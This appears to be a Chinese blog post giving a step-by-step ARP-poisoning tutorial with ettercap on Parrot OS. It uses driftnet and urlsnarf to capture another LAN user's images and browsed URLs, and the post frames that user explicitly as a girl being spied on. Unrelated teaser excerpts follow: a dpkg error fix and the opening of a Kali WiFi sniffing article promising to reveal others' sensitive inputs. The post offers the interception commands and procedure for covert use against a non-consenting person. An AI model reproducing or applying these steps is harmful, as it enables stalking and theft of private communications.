parrot内网嗅探信息ARP攻击获取记录ettercap使用教程

2019-04-13 18:23:26

摘抄网上的文章优化了详情和错误的地方,时间有限只是记录下信息,不想重新写了。

嗅探的机器要跟Parrot是在同一个局域网的网段之中,并且路由器没有开启ARP防护功能。这里网上的文章是以嗅探妹子的IP为切入点

终端输入 echo 1 > /proc/sys/net/ipv4/ip_forward 进行ip转发,输入cat /proc/sys/net/ipv4/ip_forward如果返回值为1则开启成功。

这个只是开启临时的转发,重启之后转发就会失效。

终端输入ettercap -G命令,选择Unified snifing然后选择你的网卡

点击 hosts–>scan扫描主机,然后再点击hosts list 获取主机列表

选中嗅探目标点击Add to Target1添加,选择路由器点击Add to Target2添加,然后点击Arp Poisoning插入第三方

点击开始嗅探

再打开一个终端,输入driftnet -i wlan0  等待获取图片

语法 : driftnet   [options]   [filter code]

主要参数:

-b               捕获到新的图片时发出嘟嘟声

-i  interface     选择监听接口

-f  file   读取一个指定pcap数据包中的图片

-p  不让所监听的接口使用混杂模式

-a  后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)

-m number 指定保存图片数的数目

-d directory  指定保存图片的路径

-x prefix  指定保存图片的前缀名

使用举例:

1.实时监听: driftnet -i wlan0

2.读取一个指定pcap数据包中的图片: driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/

再打开一个终端,输入urlsnarf -i wlan0 监听女神浏览过的网页日志,等待获取

只支持Http嗅探不支持https嗅探,而且还有路由器没有ARP的防御

解决dpkg/apt-get error : 子进程 post-installation script 返回了错误号 1

1 问题发现 前段时间安装screen的时候, 直接Ctrl+C终止了, 导致后来安装软件都报错, 错误信息如下 有 1 个软件包没有被完全安装或卸载 解压缩后会消耗掉 0B 的额外空间 您希望继续执行吗?[Y/n] y …… dpkg: error processing screen (–configure): 子进程 已安装 post-installation 脚本 返回了错误号 1 在处理时有错误发生: screen 子进程 已安装 post-installation 脚本 返回了错误号 1 2 问题解析 一般来说是由于我们在安装的过程中突然中止, 所以导致的环境变量异常, 软件已经可能安装了, 但是系统的信息却没有更新 软件的状态信息有误, 状态信息在/var/lib/dpkg/status查看 软件的配置信息不全, 位于/

文章收藏 使用Kali Linux监控并嗅探WiFi网络

Kali Linux是一款专为渗透测试而打造的专业操作系统,内置了超乎想象多的各种渗透测试工具,想全部都学会使用,还是需要花费很多时间的~ 今天LALA先教一下大家怎么利用Kali Linux自带的工具来简单嗅探WiFi网络下的各种信息,比如你访问了哪些网站,在网站输入了哪些敏感信息,浏览了哪些图片,等等诸如此类的。。。都是可以嗅探出来的。。。 开始之前,我们还是要做一下准备工作: 1、首先是你需要准备好一台安装好Kali Linux的虚拟机,如果还不知道怎么安装,可以看看我之前的这篇文章: 2、无线路由器一台,随便搞一个能创建WiFi就行了,当然你得先把这台路由器联网然后配置好WiFi热点。 3、让Kali Linux通过USB无线网卡联网,这里需要亲们花点小钱去某宝上买个,LALA推荐TP-LINK TL-WN725N免驱版。大概也就50块钱吧,这个网卡插上Kali直接就能识别出WLAN口的,不用去手动装乱七八糟的驱动,省时省力~ 下面是我前几天入手的一个,盒子长这个样子,东西反正太小了,我插上电脑后也懒得拔出来,就不发图了: [![](https://img.01vt.com/uploads/2019/04/1558071469-7184-lala.im-2017-12-10-37-931-280x300.png)](https://img.